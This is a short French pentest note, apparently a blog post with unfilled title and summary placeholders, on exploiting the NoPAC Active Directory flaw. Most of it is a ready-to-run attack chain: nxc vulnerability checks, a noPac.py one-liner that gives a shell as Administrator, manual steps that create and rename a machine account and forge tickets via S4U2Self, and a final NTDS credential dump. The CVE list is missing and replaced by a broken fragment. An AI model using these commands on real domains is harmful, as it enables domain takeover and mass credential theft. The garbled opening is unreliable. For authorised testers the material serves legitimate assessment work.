Title here
Summary here
NoPAC est une vulnérabilités basée sur deux CVE sorties en Novembre 2021 :
$$ à la fin).MachineAccountQuota soit au moins à 1 (par défaut c’est à 10)Pour détecter si un contrôleur de domaine est vulnérable :
nxc smb $DC_IP -u $USERNAME -p $PASSWORD -M nopacPour identifier la valeur du MachineAccountQuota :
nxc ldap $DC_IP -u $USERNAME -p $PASSWORD -M maqLe super script noPac.py de Ridter fait le café :
python3 noPac.py $DOMAIN/$USERNAME:$PASSWORD -dc-ip $DC_IP -dc-host $DC_HOST -shell --impersonate Administrator -use-ldapDevant un client, parfait on aime bien pouvoir expliquer les différentes étapes d’une exploitations qu’on vient de réaliser.
Tout d’abord, créer un compte machine :
# Si on travaille avec Exegol on peut utiliser leur script addcomputer.py
python3 addcomputer.py -computer-name $COMPUTER_NAME -computer-pass $COMPUTER_PASS -dc-host $DC_HOST -dc-ip $DC_IP $DOMAIN/$USERNAME:$PASSWORDVider les SPN qui s’ajoutent par défaut sur ce compte nouvellement créé :
python3 addspn.py --clear -t $COMPUTER_NAME -u $DOMAIN\$USERNAME -p $PASSWORD ldap://$DC_IPRenommer le compte machine comme le DC mais sans le $ :
python3 renameMachine.py -current-name $COMPUTER_NAME -new-name $DC_NAME -dc-ip $DC_IP $DOMAIN/$USERNAME:$PASSWORDObtenir un TGT :
getTGT.py -dc-ip $DC_IP $DOMAIN/$DC_NAME:$PASSWORDRéinitialiser ensuite le nom du compte créé
python3 renameMachine.py -current-name $DC_NAME -new-name $NEW_NAME -dc-ip $DC_IP $DOMAIN/$USERNAME:$PASSWORDObtenir un ST avec S4U2Self en présentant le TGT
getST.py -self -impersonate 'Administrator' -altservice "cifs/$DOMAIN" -dc-ip $DC_IP $DOMAIN/$DC_NAME -k -no-passEt hop DCSync !
export KRB5CCNAME='DomainAdmin.ccache'
nxc smb $DC_IP --use-kcache -x -whoami
nxc smb $DC_IP --use-kcache --ntds